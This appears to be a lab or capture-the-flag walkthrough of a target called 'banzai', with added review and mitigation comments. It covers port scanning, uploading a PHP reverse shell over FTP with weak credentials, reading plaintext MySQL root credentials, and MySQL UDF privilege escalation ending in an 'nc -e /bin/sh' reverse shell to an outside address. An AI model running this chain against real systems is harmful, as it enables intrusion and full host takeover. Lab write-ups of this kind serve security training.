# Enumeration of the lab target. -oA writes three result files (<base>.nmap, <base>.gnmap, <base>.xml).
# All TCP ports, with -A (OS and version detection, default scripts, traceroute) plus the "vuln" NSE script category.
nmap -A -p- -oA banzai 192.168.137.56 --min-rate=10000 --script=vuln --script-timeout=15 -v

# NOTE(review): this scan targets 192.168.137.47, while every other step on the page uses 192.168.137.56.
# This is probably a typo; confirm the in-scope address before re-running.
# It also reuses the -oA base name "banzai", so its output files replace those of the scan above.
nmap -sC -sV -O -p- -oA banzai 192.168.137.47

# UDP sweep of all ports, saved under its own base name (banzai-udp).
nmap -sU -O -p- -oA banzai-udp 192.168.137.56

# Web server scan of the HTTP service on port 80.
nikto -h 192.168.137.56:80

Pasted image 20210925185344.png

Pasted image 20210925185304.png

whatweb http://192.168.137.56

Pasted image 20210925185546.png

Bajamos php-reverse-shell.php y cambiamos la IP y el puerto.

Pasted image 20210925185858.png

cp /home/kali/boxes/php-reverse-shell.php .

ftp 192.168.137.56

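admin:admin (credenciales débiles aceptadas por el servicio FTP; el fichero subido por FTP queda accesible por HTTP, por lo que el directorio FTP parece coincidir con la raíz web)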

put php-reverse-shell.php

Pasted image 20210925185916.png

nc -lvnp 22

http://192.168.137.56/php-reverse-shell.php

Pasted image 20210925190512.png

cat /var/www/config.php

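root:EscalateRaftHubris123 (credenciales de MySQL guardadas en claro en /var/www/config.php; son las que se usan después con `mysql -u root -p`)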

Pasted image 20210925190815.png

ps aux | grep mysql

Pasted image 20210925190935.png

https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/mysql/lib_mysqludf_sys_64.so

cp /home/kali/Downloads/lib_mysqludf_sys_64.so .

ftp 192.168.137.56

put lib_mysqludf_sys_64.so

Pasted image 20210925192217.png

mysql -u root -p

Enter password: EscalateRaftHubris123

Pasted image 20210925192454.png

-- Statements entered at the mysql client prompt as the database root account
-- (password taken from /var/www/config.php earlier in the write-up).
-- Together they copy a shared library into the server's plugin directory and
-- register it as a user-defined function (UDF). Every step depends on server
-- configuration that a hardened install would not offer; the comments below
-- name the control that blocks each one.

-- Work inside the `mysql` system schema; the scratch table below is created there.
use mysql;

-- Scratch table with a single BLOB column, used only to hold the library's raw bytes.
create table cuervox(line blob);

-- LOAD_FILE() reads a file from the database host's filesystem. It requires the
-- FILE privilege, a path readable by the server, and a location permitted by
-- secure_file_priv. The path is under the web root, presumably where the
-- earlier FTP upload landed.
insert into cuervox values(load_file('/var/www/html/lib_mysqludf_sys_64.so'));

-- INTO DUMPFILE writes the single row back out as raw bytes. It only succeeds
-- if the OS account running mysqld can write to the plugin directory.
-- Mitigation: set secure_file_priv to a dedicated directory (or NULL) to
-- restrict import/export operations such as LOAD_FILE() and SELECT ... INTO,
-- and keep the plugin directory non-writable by the mysqld account.
select * from cuervox into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';

-- Registers the library's sys_exec symbol as a UDF returning an integer.
-- UDF registrations are recorded in the mysql.func table, which makes it a
-- useful place to audit for functions nobody on the team installed.
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';

Pasted image 20210925193416.png

nc -lvnp 22

-- Calls the sys_exec UDF created by the `create function ... soname` statement
-- above. The string is executed as an OS command with the privileges of the
-- mysqld process, connecting back to the listener started with `nc -lvnp 22`.
-- NOTE(review): the `ps aux | grep mysql` step presumably showed mysqld running
-- as root (the screenshot is not in the text). Running mysqld under a dedicated
-- unprivileged account limits what this call can reach.
-- Detection: mysqld spawning a shell or other child process, and outbound
-- connections initiated from the database host.
select sys_exec('nc -e /bin/sh 192.168.49.137 22');

Pasted image 20210925193313.png
